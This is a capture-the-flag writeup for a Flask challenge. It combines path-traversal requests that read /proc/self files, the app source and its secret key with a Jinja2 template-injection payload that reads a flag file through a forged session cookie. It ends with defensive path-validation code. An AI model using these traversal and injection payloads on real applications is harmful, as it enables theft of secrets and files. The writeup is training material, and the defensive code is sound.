NU1LCTFer's Road to Growth - Web Basics - Arbitrary File Read Vulnerability - afr_3 - Writeup

afr_3


What this challenge tests: knowledge of what the files under /proc/ on a Linux system are for, plus Flask template injection (SSTI).

Request http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cmdline to obtain the command line of the currently running process. The result is shown below.

Looking at the page source, there is a space in the middle (the NUL separator between the arguments in cmdline):

python server.py

Request http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/server.py to obtain the source code:

from flask import request, session, redirect, url_for, render_template_string

@app.route("/n1page", methods=["GET", "POST"])
def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None:
        # Blocklist: strips . _ { } from the value that arrived in the POST body
        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
    if "n1code" not in session or session['n1code'] is None:
        session['n1code'] = n1code
    template = None
    if session['n1code'] is not None:
        # SSTI here: the value taken from the session is %-formatted straight into the
        # template source before rendering, so the replace() filter above does not apply to it
        template = '''<h1>N1 Page</h1> <div class="row"> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
        session['n1code'] = None
    return render_template_string(template)

The flag is in flag.py and the Flask app key (secret key) is in key.py, but the arbitrary file read here filters the keyword "flag".

The source contains a Flask SSTI. The precondition is being able to forge the Flask session cookie, which requires the app key; see https://noraj.github.io/flask-session-cookie-manager/

Request http://192.168.60.134/article?name=…/…/…/…/…/proc/self/cwd/key.py to obtain the app key.

  1. Forge the cookie with an SSTI payload to read the flag:
{{''.__class__.__mro__[2].__subclasses__()[40]('flag.py').read()}}
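As an added defensive illustration (not part of the original writeup or the challenge's server.py), here is how the /article?name= handler could pin reads to an article directory instead of blocklisting the word "flag"; the directory and file names are constructed for the demo:

```python
import os
import tempfile

# Constructed stand-in for the challenge's article folder (assumption: articles live in one directory).
ARTICLE_DIR = tempfile.mkdtemp(prefix="articles_")
with open(os.path.join(ARTICLE_DIR, "article"), "w", encoding="utf-8") as fh:
    fh.write("sample article body\n")


class InvalidArticle(ValueError):
    """Raised when a requested name does not resolve to a file inside ARTICLE_DIR."""


def resolve_article(name, base_dir=ARTICLE_DIR):
    """Map a user-supplied ?name= value to a path guaranteed to stay inside base_dir.

    The challenge filtered the substring 'flag' instead, which leaves ../ traversal to
    /proc/self/cwd/server.py, key.py and so on untouched. Here the path is canonicalised
    first and then checked for containment, so '..' segments, absolute paths and symlinks
    cannot escape the directory.
    """
    if not name or "\x00" in name:
        raise InvalidArticle("empty name or NUL byte")
    base = os.path.realpath(base_dir)
    # os.path.join discards base when name is absolute; realpath then collapses '..' and symlinks
    candidate = os.path.realpath(os.path.join(base, name))
    # commonpath compares whole path components, unlike a plain string-prefix check
    if os.path.commonpath([base, candidate]) != base:
        raise InvalidArticle("path escapes article directory")
    if not os.path.isfile(candidate):
        raise InvalidArticle("no such article")
    return candidate


def read_article(name):
    """Return the article body for a validated name."""
    with open(resolve_article(name), encoding="utf-8") as fh:
        return fh.read()


def is_allowed(name):
    """True when the name resolves safely to an existing article, False otherwise."""
    try:
        resolve_article(name)
        return True
    except InvalidArticle:
        return False
```

The SSTI in n1page has a fix of the same shape: pass session['n1code'] to render_template_string as a template variable instead of %-formatting it into the template source.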